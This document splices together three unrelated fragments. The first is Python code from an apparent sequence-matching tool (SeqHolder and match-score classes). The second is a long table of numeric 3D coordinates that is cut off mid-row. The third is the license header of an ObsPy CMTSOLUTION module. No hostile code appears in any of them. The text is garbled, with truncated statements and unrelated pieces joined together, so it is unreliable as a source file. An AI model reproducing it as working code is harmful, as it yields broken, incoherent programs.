self.failed_fh = self.open_output_fh(self.failed)
# Do the chop-ing...
for each_seq in self.input_seqs:
# CAUTION
# The below is a munge.
# According to https://github.com/biopython/biopython/issues/398 ,
# BioPython mimics an old tool's weird behavior by outputting the
# ID in the description field. The fix for it relies on a comparing
# a white-space 'split' to remove the ID if it's in the description.
# So that doesn't work if you modify the ID or so, so I remove right
# after parsing.
each_seq.description = re.sub(str(each_seq.id),"",
each_seq.description).lstrip()
seq_holder = SeqHolder(each_seq,configuration=self)
seq_holder.chop()
self.close_fhs()
class MatchScores:
"""This is a little class just to hold the three scores under attributes,
such that they're easier to type for writing filters. Also, it flattens
them for debug report printing.
:param substitions: number to store under `.substitions` attribute
:type substitions: int
:param insertions: number to store under `.insertions` attribute
:type insertions: int
:param deletions: number to store under `.deletions` attribute
:type deletions: int
"""
def __init__(self, substitutions, insertions, deletions):
self.substitutions = substitutions
self.insertions = insertions
self.deletions = deletions
def flatten(self):
"""Flatten this object for printing debug reports.
:return: string in form substitutions_insertions_deletions
:rtype: str
"""
return str(self.substitutions)+"_"+str(self.insertions)+"_"+\
str(self.deletions)
class GroupStats:
"""Object for conveniently holding parameters from the match, so that
they're easier to type for filters/output specification, and to flatten
for debug printing.
:param start: number to store under `.start` attribute
:type start: int
:param end: number to store under `.end` attribute
:type end: int
:param length: number to store under `.length` attribute
:type length: int
:param quality: list of numbers to store under `.quality` attribute
:type quality: list of int
:param quality_string: string of the quality array under PHRED encodings
:type quality_string: string
"""
def __init__(self, start, end, seq, quality):
self.start = start
self.end = end
self.length = self.end - self.start
self.seq = seq
self.quality = quality
self.quality_string = phred_number_array_to_joined_string(quality)
def flatten(self):
"""Flatten this object for printing debug reports, but just for
the start, end, length attributes. Not quality.
:return: string in form start_end_length
:rtype: str
"""
return str(self.start)+"_"+str(self.end)+"_"+str(self.length)
def __eq__(self,other):
"""Attention! This is a hack to allow for using the group's name
(ie 'barcode') instead of accessing the '.seq' method.
"""
return str(self.seq.seq) == other
class SeqHolder:
"""This is the main holder of sequences, and has methods for doing matching,
building contexts, filtering, etcetra. Basically there is one of these
initialized per input, then each operation is done with this object, then
it generates the appropriate outputs and `chop` actually writes them.
Used in `chop`.
The `.seqs` attribute holds the sequences accessed by the matching,
initialized with the `input_record` SeqRecord and a `dummyspacer` for
output formatting with a separator.
:param input_record: an input SeqRecord object
:type input_record: Bio.SeqRecord.SeqRecord
:param configuration: the whole program's Configuration object, with
appropriate file-handles opened up and defaults set
:type configuration: itermae.Configuration
# :raises [ErrorType]: [ErrorDescription]
# :return: [ReturnDescription]
# :rtype: [ReturnType]
"""
def __init__(self, input_record, configuration):
self.seqs = {
'dummyspacer': SeqRecord.SeqRecord(Seq.Seq("X"),id="dummyspacer"),
'input': input_record }
self.seqs['dummyspacer'].letter_annotations['phred_quality'] = [40]
self.configuration = configuration
# These two dicts hold the scores for each match operation (in order),
# and the start end length statistics for each matched group.
self.match_scores = {}
self.group_stats = {}
def apply_operation(self, match_id, input_group, regex):
"""This applies the given match to the `SeqHolder` object, and saves
how it did internally.
:param match_id: what name should we call this match? This is useful
for debugging reports and filtering only.
:type match_id: str
:param input_group: which input group to use, by name of the group
:type input_group: str
:param regex: the regular expression to apply, complete with named
groups to save for subsequent match operations
:type regex: regex compiled regular expression object
:return: self, this is just done so it can exit early if no valid input
:rtype: itermae.SeqHolder
"""
# Try to find the input, if it ain't here then just return
try:
self.seqs[input_group]
except:
self.match_scores[match_id] = MatchScores(None,None,None)
return self
if self.configuration.verbosity >= 3:
print("\n["+str(time.time())+"] : attempting to match : "+
str(regex)+" against "+self.seqs[input_group].seq,
file=sys.stderr)
# Here we execute the actual meat of the business.
# Note that the input is made uppercase!
fuzzy_match = regex.search( str(self.seqs[input_group].seq).upper() )
if self.configuration.verbosity >= 3:
print("\n["+str(time.time())+"] : match is : "+str(fuzzy_match),
file=sys.stderr)
try:
# This is making and storing an object for just accessing these
# numbers nicely in the arguments for forming outputs and filtering.
self.match_scores[match_id] = MatchScores(*fuzzy_match.fuzzy_counts)
# Then for each of the groups matched by the regex
for match_name in fuzzy_match.groupdict():
# We stick into the holder a slice of the input seq, that is
# the matched # span of this matching group. So, extract.
self.seqs[match_name] = \
self.seqs[input_group][slice(*fuzzy_match.span(match_name))]
#self.seqs[match_name].description = ""
# This is to fix a bug where the ID is stuck into the
# description and gets unpacked on forming outputs
# Then we record the start, end, and length of the matched span
self.group_stats[match_name] = \
GroupStats(*fuzzy_match.span(match_name),
seq=self.seqs[match_name],
quality=self.seqs[match_name].letter_annotations['phred_quality']
)
except:
self.match_scores[match_id] = MatchScores(None,None,None)
def build_context(self):
"""This unpacks group match stats/scores into an environment that
the filter can then use to ... well ... filter.
"""
# This is context for the filters, so is operating more as values,
# as opposed to the context_seq which is operating with SeqRecords
self.context_filter = { **self.group_stats , **self.match_scores }
# Then unpack | |
[-0.79546369024868, 0.05991487568396, -0.57235298198835],
[-0.69209820344694, 0.05991487568396, -0.57235298198835],
[-0.58120945840524, 0.05712058778268, -0.58120945840524],
[-0.45548262743559, 0.05474066986092, -0.59925804242534],
[-1.00000000000000, 0.22034867784306, -0.61017433892153],
[-0.89849390365871, 0.21353103704236, -0.59938063492158],
[-0.80821469636381, 0.21200732961882, -0.59557793689121],
[-0.71565649846207, 0.21353103704236, -0.59938063492158],
[-0.61017433892153, 0.22034867784306, -0.61017433892153],
[-1.00000000000000, 0.37445219127856, -0.62719310134571],
[-0.90533315725650, 0.36192227945240, -0.62778228539838],
[-0.82880683679752, 0.36192227945240, -0.62778228539838],
[-0.74725908993286, 0.37445219127856, -0.62719310134571],
[-1.00000000000000, 0.51226141841950, -0.65107787413874],
[-0.91826859853484, 0.50546430717196, -0.66892711010229],
[-0.86118354428076, 0.51226141841950, -0.65107787413874],
[-1.00000000000000, 0.62972921442352, -0.68283080625434],
[-0.94689840816918, 0.62972921442352, -0.68283080625434],
[-1.00000000000000, 0.72367932928324, -0.72367932928324],
[-1.00000000000000, -1.00000000000000, -0.58850483431866],
[-0.94367298086688, -1.00000000000000, -0.53977863434066],
[-0.85467813358830, -1.00000000000000, -0.50223646595824],
[-0.73801547866742, -1.00000000000000, -0.47450138980813],
[-0.59925804242534, -1.00000000000000, -0.45548262743559],
[-0.44439033087540, -1.00000000000000, -0.44439033087540],
[-0.27962686227842, -1.00000000000000, -0.44074627544316],
[-0.11121933824920, -1.00000000000000, -0.44439033087540],
[0.05474066986092, -1.00000000000000, -0.45548262743559],
[0.21251686847555, -1.00000000000000, -0.47450138980813],
[0.35691459954653, -1.00000000000000, -0.50223646595824],
[0.48345161520754, -1.00000000000000, -0.53977863434066],
[0.58850483431866, -1.00000000000000, -0.58850483431866],
[-1.00000000000000, -0.94367298086688, -0.53977863434066],
[-0.91533769804486, -0.91533769804486, -0.52168268319682],
[-0.82197902687780, -0.90271908968347, -0.47858570939270],
[-0.70620673063170, -0.89619431421031, -0.44889894801261],
[-0.57106333491179, -0.89275319595316, -0.43064547863352],
[-0.42195032631194, -0.89124316588241, -0.42195032631194],
[-0.26485618149372, -0.89124316588241, -0.42195032631194],
[-0.10553799050153, -0.89275319595316, -0.43064547863352],
[0.05129999285461, -0.89619431421031, -0.44889894801261],
[0.20328382595397, -0.90271908968347, -0.47858570939270],
[0.35235807928655, -0.91533769804486, -0.52168268319682],
[0.48345161520754, -0.94367298086688, -0.53977863434066],
[-1.00000000000000, -0.85467813358830, -0.50223646595824],
[-0.90271908968347, -0.82197902687780, -0.47858570939270],
[-0.80237272611754, -0.80237272611754, -0.44624189631944],
[-0.68465203917083, -0.79077416730400, -0.42330908651523],
[-0.55093034546477, -0.78460952663812, -0.41008062239189],
[-0.40577573935925, -0.78267278192224, -0.40577573935925],
[-0.25437950550522, -0.78460952663812, -0.41008062239189],
[-0.10126470700993, -0.79077416730400, -0.42330908651523],
[0.05098734855452, -0.80237272611754, -0.44624189631944],
[0.20328382595397, -0.82197902687780, -0.47858570939270],
[0.35691459954653, -0.85467813358830, -0.50223646595824],
[-1.00000000000000, -0.73801547866742, -0.47450138980813],
[-0.89619431421031, -0.70620673063170, -0.44889894801261],
[-0.79077416730400, -0.68465203917083, -0.42330908651523],
[-0.67157579256611, -0.67157579256611, -0.40609844374786],
[-0.53927929004885, -0.66542091268526, -0.39764989863294],
[-0.39764989863294, -0.66542091268526, -0.39764989863294],
[-0.25074997111992, -0.67157579256611, -0.40609844374786],
[-0.10126470700993, -0.68465203917083, -0.42330908651523],
[0.05129999285461, -0.70620673063170, -0.44889894801261],
[0.21251686847555, -0.73801547866742, -0.47450138980813],
[-1.00000000000000, -0.59925804242534, -0.45548262743559],
[-0.89275319595316, -0.57106333491179, -0.43064547863352],
[-0.78460952663812, -0.55093034546477, -0.41008062239189],
[-0.66542091268526, -0.53927929004885, -0.39764989863294],
[-0.53548665674294, -0.53548665674294, -0.39354002977118],
[-0.39764989863294, -0.53927929004885, -0.39764989863294],
[-0.25437950550522, -0.55093034546477, -0.41008062239189],
[-0.10553799050153, -0.57106333491179, -0.43064547863352],
[0.05474066986092, -0.59925804242534, -0.45548262743559],
[-1.00000000000000, -0.44439033087540, -0.44439033087540],
[-0.89124316588241, -0.42195032631194, -0.42195032631194],
[-0.78267278192224, -0.40577573935925, -0.40577573935925],
[-0.66542091268526, -0.39764989863294, -0.39764989863294],
[-0.53927929004885, -0.39764989863294, -0.39764989863294],
[-0.40577573935925, -0.40577573935925, -0.40577573935925],
[-0.26485618149372, -0.42195032631194, -0.42195032631194],
[-0.11121933824920, -0.44439033087540, -0.44439033087540],
[-1.00000000000000, -0.27962686227842, -0.44074627544316],
[-0.89124316588241, -0.26485618149372, -0.42195032631194],
[-0.78460952663812, -0.25437950550522, -0.41008062239189],
[-0.67157579256611, -0.25074997111992, -0.40609844374786],
[-0.55093034546477, -0.25437950550522, -0.41008062239189],
[-0.42195032631194, -0.26485618149372, -0.42195032631194],
[-0.27962686227842, -0.27962686227842, -0.44074627544316],
[-1.00000000000000, -0.11121933824920, -0.44439033087540],
[-0.89275319595316, -0.10553799050153, -0.43064547863352],
[-0.79077416730400, -0.10126470700993, -0.42330908651523],
[-0.68465203917083, -0.10126470700993, -0.42330908651523],
[-0.57106333491179, -0.10553799050153, -0.43064547863352],
[-0.44439033087540, -0.11121933824920, -0.44439033087540],
[-1.00000000000000, 0.05474066986092, -0.45548262743559],
[-0.89619431421031, 0.05129999285461, -0.44889894801261],
[-0.80237272611754, 0.05098734855452, -0.44624189631944],
[-0.70620673063170, 0.05129999285461, -0.44889894801261],
[-0.59925804242534, 0.05474066986092, -0.45548262743559],
[-1.00000000000000, 0.21251686847555, -0.47450138980813],
[-0.90271908968347, 0.20328382595397, -0.47858570939270],
[-0.82197902687780, 0.20328382595397, -0.47858570939270],
[-0.73801547866742, 0.21251686847555, -0.47450138980813],
[-1.00000000000000, 0.35691459954653, -0.50223646595824],
[-0.91533769804486, 0.35235807928655, -0.52168268319682],
[-0.85467813358830, 0.35691459954653, -0.50223646595824],
[-1.00000000000000, 0.48345161520754, -0.53977863434066],
[-0.94367298086688, 0.48345161520754, -0.53977863434066],
[-1.00000000000000, 0.58850483431866, -0.58850483431866],
[-1.00000000000000, -1.00000000000000, -0.43441503691212],
[-0.94153338637932, -1.00000000000000, -0.37973175758212],
[-0.85055979016974, -1.00000000000000, -0.33819570282874],
[-0.73266516174362, -1.00000000000000, -0.30834740911645],
[-0.59392944953705, -1.00000000000000, -0.28907450090662],
[-0.44074627544316, -1.00000000000000, -0.27962686227842],
[-0.27962686227842, -1.00000000000000, -0.27962686227842],
[-0.11699604955632, -1.00000000000000, -0.28907450090662],
[0.04101257086006, -1.00000000000000, -0.30834740911645],
[0.18875549299847, -1.00000000000000, -0.33819570282874],
[0.32126514396144, -1.00000000000000, -0.37973175758212],
[0.43441503691212, -1.00000000000000, -0.43441503691212],
[-1.00000000000000, -0.94153338637932, -0.37973175758212],
[-0.91361325731751, -0.91361325731751, -0.35580977157487],
[-0.81822259638933, -0.90132394717945, -0.31409235901703],
[-0.70174749688164, -0.89515246800868, -0.28598097100158],
[-0.56779754185188, -0.89215000219033, -0.27002622797889],
[-0.42195032631194, -0.89124316588241, -0.26485618149372],
[-0.27002622797889, -0.89215000219033, -0.27002622797889],
[-0.11711906410810, -0.89515246800868, -0.28598097100158],
[0.03363890258581, -0.90132394717945, -0.31409235901703],
[0.18303628620988, -0.91361325731751, -0.35580977157487],
[0.32126514396144, -0.94153338637932, -0.37973175758212],
[-1.00000000000000, -0.85055979016974, -0.33819570282874],
[-0.90132394717945, -0.81822259638933, -0.31409235901703],
[-0.79964507343425, -0.79964507343425, -0.28431281823316],
[-0.68226100768640, -0.78928444359942, -0.26422727435709],
[-0.55093034546477, -0.78460952663812, -0.25437950550522],
[-0.41008062239189, -0.78460952663812, -0.25437950550522],
[-0.26422727435709, -0.78928444359942, -0.26422727435709],
[-0.11639703489834, -0.79964507343425, -0.28431281823316],
[0.03363890258581, -0.81822259638933, -0.31409235901703],
[0.18875549299847, -0.85055979016974, -0.33819570282874],
[-1.00000000000000, -0.73266516174362, -0.30834740911645],
[-0.89515246800868, -0.70174749688164, -0.28598097100158],
[-0.78928444359942, -0.68226100768640, -0.26422727435709],
[-0.67157579256611, -0.67157579256611, -0.25074997111992],
[-0.54278153811667, -0.66817385848353, -0.24626306528312],
[-0.40609844374786, -0.67157579256611, -0.25074997111992],
[-0.26422727435709, -0.68226100768640, -0.26422727435709],
[-0.11711906410810, -0.70174749688164, -0.28598097100158],
[0.04101257086006, -0.73266516174362, -0.30834740911645],
[-1.00000000000000, -0.59392944953705, -0.28907450090662],
[-0.89215000219033, -0.56779754185188, -0.27002622797889],
[-0.78460952663812, -0.55093034546477, -0.25437950550522],
[-0.66817385848353, -0.54278153811667, -0.24626306528312],
[-0.54278153811667, -0.54278153811667, -0.24626306528312],
[-0.41008062239189, -0.55093034546477, -0.25437950550522],
[-0.27002622797889, -0.56779754185188, -0.27002622797889],
[-0.11699604955632, -0.59392944953705, -0.28907450090662],
[-1.00000000000000, -0.44074627544316, -0.27962686227842],
[-0.89124316588241, -0.42195032631194, -0.26485618149372],
[-0.78460952663812, -0.41008062239189, -0.25437950550522],
[-0.67157579256611, -0.40609844374786, -0.25074997111992],
[-0.55093034546477, -0.41008062239189, -0.25437950550522],
[-0.42195032631194, -0.42195032631194, -0.26485618149372],
[-0.27962686227842, -0.44074627544316, -0.27962686227842],
[-1.00000000000000, -0.27962686227842, -0.27962686227842],
[-0.89215000219033, -0.27002622797889, -0.27002622797889],
[-0.78928444359942, -0.26422727435709, -0.26422727435709],
[-0.68226100768640, -0.26422727435709, -0.26422727435709],
[-0.56779754185188, -0.27002622797889, -0.27002622797889],
[-0.44074627544316, -0.27962686227842, -0.27962686227842],
[-1.00000000000000, -0.11699604955632, -0.28907450090662],
[-0.89515246800868, -0.11711906410810, -0.28598097100158],
[-0.79964507343425, -0.11639703489834, -0.28431281823316],
[-0.70174749688164, -0.11711906410810, -0.28598097100158],
[-0.59392944953705, -0.11699604955632, -0.28907450090662],
[-1.00000000000000, 0.04101257086006, -0.30834740911645],
[-0.90132394717945, 0.03363890258581, -0.31409235901703],
[-0.81822259638933, 0.03363890258581, -0.31409235901703],
[-0.73266516174362, 0.04101257086006, -0.30834740911645],
[-1.00000000000000, 0.18875549299847, -0.33819570282874],
[-0.91361325731751, 0.18303628620988, -0.35580977157487],
[-0.85055979016974, 0.18875549299847, -0.33819570282874],
[-1.00000000000000, 0.32126514396144, -0.37973175758212],
[-0.94153338637932, 0.32126514396144, -0.37973175758212],
[-1.00000000000000, 0.43441503691212, -0.43441503691212],
[-1.00000000000000, -1.00000000000000, -0.26636265287828],
[-0.94031572376258, -1.00000000000000, -0.20795453403575],
[-0.84856652844490, -1.00000000000000, -0.16450620740505],
[-0.73091449282331, -1.00000000000000, -0.13454275358835],
[-0.59392944953705, -1.00000000000000, -0.11699604955632],
[-0.44439033087540, -1.00000000000000, -0.11121933824920],
[-0.28907450090662, -1.00000000000000, -0.11699604955632],
[-0.13454275358835, -1.00000000000000, -0.13454275358835],
[0.01307273584995, -1.00000000000000, -0.16450620740505],
[0.14827025779833, -1.00000000000000, -0.20795453403575],
[0.26636265287828, -1.00000000000000, -0.26636265287828],
[-1.00000000000000, -0.94031572376258, -0.20795453403575],
[-0.91281028806768, -0.91281028806768, -0.17821561606993],
[-0.81702189747097, -0.90088437869935, -0.14104686191484],
[-0.70174749688164, -0.89515246800868, -0.11711906410810],
[-0.57106333491179, -0.89275319595316, -0.10553799050153],
[-0.43064547863352, -0.89275319595316, -0.10553799050153],
[-0.28598097100158, -0.89515246800868, -0.11711906410810],
[-0.14104686191484, -0.90088437869935, -0.14104686191484],
[0.00383619220529, -0.91281028806768, -0.17821561606993],
[0.14827025779834, -0.94031572376258, -0.20795453403575],
[-1.00000000000000, -0.84856652844490, -0.16450620740505],
[-0.90088437869935, -0.81702189747097, -0.14104686191484],
[-0.79964507343425, -0.79964507343425, -0.11639703489834],
[-0.68465203917083, -0.79077416730400, -0.10126470700993],
[-0.55785828724523, -0.78803820908470, -0.09624521642484],
[-0.42330908651523, -0.79077416730400, -0.10126470700993],
[-0.28431281823316, -0.79964507343425, -0.11639703489834],
[-0.14104686191484, -0.81702189747097, -0.14104686191484],
[0.01307273584995, -0.84856652844490, -0.16450620740505],
[-1.00000000000000, -0.73091449282331, -0.13454275358835],
[-0.89515246800868, -0.70174749688164, -0.11711906410810],
[-0.79077416730400, -0.68465203917083, -0.10126470700993],
[-0.67674763053283, -0.67674763053283, -0.09293873548053],
[-0.55356600345381, -0.67674763053283, -0.09293873548053],
[-0.42330908651523, -0.68465203917083, -0.10126470700993],
[-0.28598097100158, -0.70174749688164, -0.11711906410810],
[-0.13454275358835, -0.73091449282331, -0.13454275358835],
[-1.00000000000000, -0.59392944953705, -0.11699604955632],
[-0.89275319595316, -0.57106333491179, -0.10553799050153],
[-0.78803820908470, -0.55785828724523, -0.09624521642484],
[-0.67674763053283, -0.55356600345381, -0.09293873548053],
[-0.55785828724523, -0.55785828724523, -0.09624521642484],
[-0.43064547863352, -0.57106333491179, -0.10553799050153],
[-0.28907450090662, -0.59392944953705, -0.11699604955632],
[-1.00000000000000, -0.44439033087540, -0.11121933824920],
[-0.89275319595316, -0.43064547863352, -0.10553799050153],
[-0.79077416730400, -0.42330908651523, -0.10126470700993],
[-0.68465203917083, -0.42330908651523, -0.10126470700993],
[-0.57106333491179, -0.43064547863352, -0.10553799050153],
[-0.44439033087540, -0.44439033087540, -0.11121933824920],
[-1.00000000000000, -0.28907450090662, -0.11699604955632],
[-0.89515246800868, -0.28598097100158, -0.11711906410810],
[-0.79964507343425, -0.28431281823316, -0.11639703489834],
[-0.70174749688164, -0.28598097100158, -0.11711906410810],
[-0.59392944953705, -0.28907450090662, -0.11699604955632],
[-1.00000000000000, -0.13454275358835, -0.13454275358835],
[-0.90088437869935, -0.14104686191484, -0.14104686191484],
[-0.81702189747097, -0.14104686191484, -0.14104686191484],
[-0.73091449282331, -0.13454275358835, -0.13454275358835],
[-1.00000000000000, 0.01307273584995, -0.16450620740505],
[-0.91281028806768, 0.00383619220529, -0.17821561606993],
[-0.84856652844490, 0.01307273584995, -0.16450620740505],
[-1.00000000000000, 0.14827025779833, -0.20795453403575],
[-0.94031572376258, 0.14827025779833, -0.20795453403575],
[-1.00000000000000, 0.26636265287828, -0.26636265287828],
[-1.00000000000000, -1.00000000000000, -0.08974909348465],
[-0.93992089073865, -1.00000000000000, -0.03003955463067],
[-0.84856652844490, -1.00000000000000, 0.01307273584995],
[-0.73266516174362, -1.00000000000000, 0.04101257086006],
[-0.59925804242534, -1.00000000000000, 0.05474066986092],
[-0.45548262743559, -1.00000000000000, 0.05474066986092],
[-0.30834740911645, -1.00000000000000, 0.04101257086006],
[-0.16450620740505, -1.00000000000000, 0.01307273584995],
[-0.03003955463067, -1.00000000000000, -0.03003955463067],
[0.08974909348465, -1.00000000000000, -0.08974909348465],
[-1.00000000000000, -0.93992089073865, -0.03003955463067],
[-0.91281028806768, -0.91281028806768, 0.00383619220529],
[-0.81822259638933, -0.90132394717945, 0.03363890258581],
[-0.70620673063170, -0.89619431421031, 0.05129999285461],
[-0.58120945840524, -0.89470167097220, 0.05712058778268],
[-0.44889894801261, -0.89619431421031, 0.05129999285461],
[-0.31409235901703, -0.90132394717945, 0.03363890258581],
[-0.17821561606993, -0.91281028806768, 0.00383619220529],
[-0.03003955463067, -0.93992089073865, -0.03003955463067],
[-1.00000000000000, -0.84856652844490, 0.01307273584995],
[-0.90132394717945, -0.81822259638933, 0.03363890258581],
[-0.80237272611754, -0.80237272611754, 0.05098734855452],
[-0.69209820344694, -0.79546369024868, 0.05991487568396],
[-0.57235298198835, -0.79546369024868, 0.05991487568396],
[-0.44624189631944, -0.80237272611754, 0.05098734855452],
[-0.31409235901703, -0.81822259638933, 0.03363890258581],
[-0.16450620740505, -0.84856652844490, 0.01307273584995],
[-1.00000000000000, -0.73266516174362, 0.04101257086006],
[-0.89619431421031, -0.70620673063170, 0.05129999285461],
[-0.79546369024868, -0.69209820344694, 0.05991487568396],
[-0.68766270949317, -0.68766270949317, 0.06298812847952],
[-0.57235298198835, -0.69209820344694, 0.05991487568396],
[-0.44889894801261, -0.70620673063170, 0.05129999285461],
[-0.30834740911645, -0.73266516174362, 0.04101257086006],
[-1.00000000000000, -0.59925804242534, 0.05474066986092],
[-0.89470167097220, -0.58120945840524, 0.05712058778268],
[-0.79546369024868, -0.57235298198835, 0.05991487568396],
[-0.69209820344694, -0.57235298198835, 0.05991487568396],
[-0.58120945840524, -0.58120945840524, 0.05712058778268],
[-0.45548262743559, -0.59925804242534, 0.05474066986092],
[-1.00000000000000, -0.45548262743559, 0.05474066986092],
[-0.89619431421031, -0.44889894801261, 0.05129999285461],
[-0.80237272611754, -0.44624189631944, 0.05098734855452],
[-0.70620673063170, -0.44889894801261, 0.05129999285461],
[-0.59925804242534, -0.45548262743559, 0.05474066986092],
[-1.00000000000000, -0.30834740911645, 0.04101257086006],
[-0.90132394717945, -0.31409235901703, 0.03363890258581],
[-0.81822259638933, -0.31409235901703, 0.03363890258581],
[-0.73266516174362, -0.30834740911645, 0.04101257086006],
[-1.00000000000000, -0.16450620740505, 0.01307273584995],
[-0.91281028806768, -0.17821561606993, 0.00383619220529],
[-0.84856652844490, -0.16450620740505, 0.01307273584995],
[-1.00000000000000, -0.03003955463067, -0.03003955463067],
[-0.93992089073865, -0.03003955463067, -0.03003955463067],
[-1.00000000000000, 0.08974909348465, -0.08974909348465],
[-1.00000000000000, -1.00000000000000, 0.08974909348465],
[-0.94031572376258, -1.00000000000000, 0.14827025779833],
[-0.85055979016974, -1.00000000000000, 0.18875549299847],
[-0.73801547866742, -1.00000000000000, 0.21251686847555],
[-0.61017433892153, -1.00000000000000, 0.22034867784306],
[-0.47450138980813, -1.00000000000000, 0.21251686847555],
[-0.33819570282874, -1.00000000000000, 0.18875549299847],
[-0.20795453403575, -1.00000000000000, 0.14827025779834],
[-0.08974909348465, -1.00000000000000, 0.08974909348465],
[-1.00000000000000, -0.94031572376258, 0.14827025779833],
[-0.91361325731751, -0.91361325731751, 0.18303628620988],
[-0.82197902687780, -0.90271908968347, 0.20328382595397],
[-0.71565649846207, -0.89849390365871, 0.21353103704236],
[-0.59938063492158, -0.89849390365871, 0.21353103704236],
[-0.47858570939270, -0.90271908968347, 0.20328382595397],
[-0.35580977157487, -0.91361325731751, 0.18303628620988],
[-0.20795453403575, -0.94031572376258, 0.14827025779833],
[-1.00000000000000, -0.85055979016974, 0.18875549299847],
[-0.90271908968347, -0.82197902687780, 0.20328382595397],
[-0.80821469636381, -0.80821469636381, 0.21200732961882],
[-0.70546057011574, -0.80407960155614, 0.21500074178762],
[-0.59557793689121, -0.80821469636381, 0.21200732961882],
[-0.47858570939270, -0.82197902687780, 0.20328382595397],
[-0.33819570282874, -0.85055979016974, 0.18875549299847],
[-1.00000000000000, -0.73801547866742, 0.21251686847555],
[-0.89849390365871, -0.71565649846207, 0.21353103704236],
[-0.80407960155614, -0.70546057011574, 0.21500074178762],
[-0.70546057011574, -0.70546057011574, 0.21500074178762],
[-0.59938063492158, -0.71565649846207, 0.21353103704236],
[-0.47450138980813, -0.73801547866742, 0.21251686847555],
[-1.00000000000000, -0.61017433892153, 0.22034867784306],
[-0.89849390365871, -0.59938063492158, 0.21353103704236],
[-0.80821469636381, -0.59557793689120, 0.21200732961882],
[-0.71565649846207, -0.59938063492158, 0.21353103704236],
[-0.61017433892153, -0.61017433892153, 0.22034867784306],
[-1.00000000000000, -0.47450138980813, 0.21251686847555],
[-0.90271908968347, -0.47858570939270, 0.20328382595397],
[-0.82197902687780, -0.47858570939270, 0.20328382595397],
[-0.73801547866742, -0.47450138980813, 0.21251686847555],
[-1.00000000000000, -0.33819570282874, 0.18875549299847],
[-0.91361325731751, -0.35580977157487, 0.18303628620988],
[-0.85055979016974, -0.33819570282874, 0.18875549299847],
[-1.00000000000000, -0.20795453403575, 0.14827025779834],
[-0.94031572376258, -0.20795453403575, 0.14827025779834],
[-1.00000000000000, -0.08974909348465, 0.08974909348465],
[-1.00000000000000, -1.00000000000000, 0.26636265287828],
[-0.94153338637932, -1.00000000000000, 0.32126514396144],
[-0.85467813358830, -1.00000000000000, 0.35691459954653],
[-0.74725908993286, -1.00000000000000, 0.37445219127856],
[-0.62719310134570, -1.00000000000000, 0.37445219127856],
[-0.50223646595824, -1.00000000000000, 0.35691459954653],
[-0.37973175758212, -1.00000000000000, 0.32126514396144],
[-0.26636265287828, -1.00000000000000, 0.26636265287828],
[-1.00000000000000, -0.94153338637932, 0.32126514396144],
[-0.91533769804486, -0.91533769804486, 0.35235807928655],
[-0.82880683679752, -0.90533315725650, 0.36192227945240],
[-0.73132910648164, -0.90259903319141, 0.36525724615468],
[-0.62778228539838, -0.90533315725650, 0.36192227945240],
[-0.52168268319682, -0.91533769804486, 0.35235807928655],
[-0.37973175758212, -0.94153338637932, 0.32126514396144],
[-1.00000000000000, -0.85467813358830, 0.35691459954653],
[-0.90533315725650, -0.82880683679752, 0.36192227945240],
[-0.81806030657087, -0.81806030657087, 0.36234260848776],
[-0.72622199534603, -0.81806030657087, 0.36234260848776],
[-0.62778228539838, -0.82880683679752, 0.36192227945240],
[-0.50223646595824, -0.85467813358830, 0.35691459954653],
[-1.00000000000000, -0.74725908993286, 0.37445219127856],
[-0.90259903319141, -0.73132910648164, 0.36525724615468],
[-0.81806030657087, -0.72622199534603, 0.36234260848776],
[-0.73132910648164, -0.73132910648164, 0.36525724615468],
[-0.62719310134571, -0.74725908993286, 0.37445219127856],
[-1.00000000000000, -0.62719310134570, 0.37445219127856],
[-0.90533315725650, -0.62778228539838, 0.36192227945240],
[-0.82880683679752, -0.62778228539838, 0.36192227945240],
[-0.74725908993286, -0.62719310134570, 0.37445219127856],
[-1.00000000000000, -0.50223646595824, 0.35691459954653],
[-0.91533769804486, -0.52168268319682, 0.35235807928655],
[-0.85467813358830, -0.50223646595824, 0.35691459954653],
[-1.00000000000000, -0.37973175758212, 0.32126514396144],
[-0.94153338637932, -0.37973175758212, 0.32126514396144],
[-1.00000000000000, -0.26636265287828, 0.26636265287828],
[-1.00000000000000, -1.00000000000000, 0.43441503691212],
[-0.94367298086688, -1.00000000000000, 0.48345161520754],
[-0.86118354428076, -1.00000000000000, 0.51226141841950],
[-0.76088114861788, -1.00000000000000, 0.52176229723576],
[-0.65107787413874, -1.00000000000000, 0.51226141841950],
[-0.53977863434066, -1.00000000000000, 0.48345161520754],
[-0.43441503691212, -1.00000000000000, 0.43441503691212],
[-1.00000000000000, -0.94367298086688, 0.48345161520754],
[-0.91826859853484, -0.91826859853484, 0.50546430717196],
[-0.83977988741760, -0.90975051014484, 0.50506413346777],
[-0.75553373590533, -0.90975051014484, 0.50506413346777],
[-0.66892711010229, -0.91826859853484, 0.50546430717196],
[-0.53977863434066, -0.94367298086688, 0.48345161520754],
[-1.00000000000000, -0.86118354428076, 0.51226141841950],
[-0.90975051014484, -0.83977988741760, 0.50506413346777],
[-0.83354227525151, -0.83354227525151, 0.50062682575452],
[-0.75553373590533, -0.83977988741760, 0.50506413346777],
[-0.65107787413874, -0.86118354428076, 0.51226141841950],
[-1.00000000000000, -0.76088114861788, 0.52176229723576],
[-0.90975051014484, -0.75553373590533, 0.50506413346777],
[-0.83977988741760, -0.75553373590533, 0.50506413346777],
[-0.76088114861788, -0.76088114861788, 0.52176229723576],
[-1.00000000000000, -0.65107787413874, 0.51226141841950],
[-0.91826859853484, -0.66892711010229, 0.50546430717196],
[-0.86118354428076, -0.65107787413874, 0.51226141841950],
[-1.00000000000000, -0.53977863434066, 0.48345161520754],
[-0.94367298086688, -0.53977863434066, 0.48345161520754],
[-1.00000000000000, -0.43441503691212, 0.43441503691212],
[-1.00000000000000, -1.00000000000000, 0.58850483431866],
[-0.94689840816918, -1.00000000000000, 0.62972921442352],
[-0.87046490686619, -1.00000000000000, 0.65001691674374],
[-0.77955200987756, -1.00000000000000, 0.65001691674374],
[-0.68283080625434, -1.00000000000000, 0.62972921442352],
[-0.58850483431866, -1.00000000000000, 0.58850483431866],
[-1.00000000000000, -0.94689840816918, 0.62972921442352],
[-0.92300465044929, -0.92300465044929, 0.63735081525634],
[-0.85699505928483, -0.91725218290052, | |
<filename>IRIS_data_download/IRIS_download_support/obspy/io/cmtsolution/core.py
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
CMTSOLUTION file format support for ObsPy.
:copyright:
The ObsPy Development Team (<EMAIL>)
:license:
GNU Lesser General Public License, Version 3
(https://www.gnu.org/copyleft/lesser.html)
"""
from __future__ import (absolute_import, division, print_function,
unicode_literals)
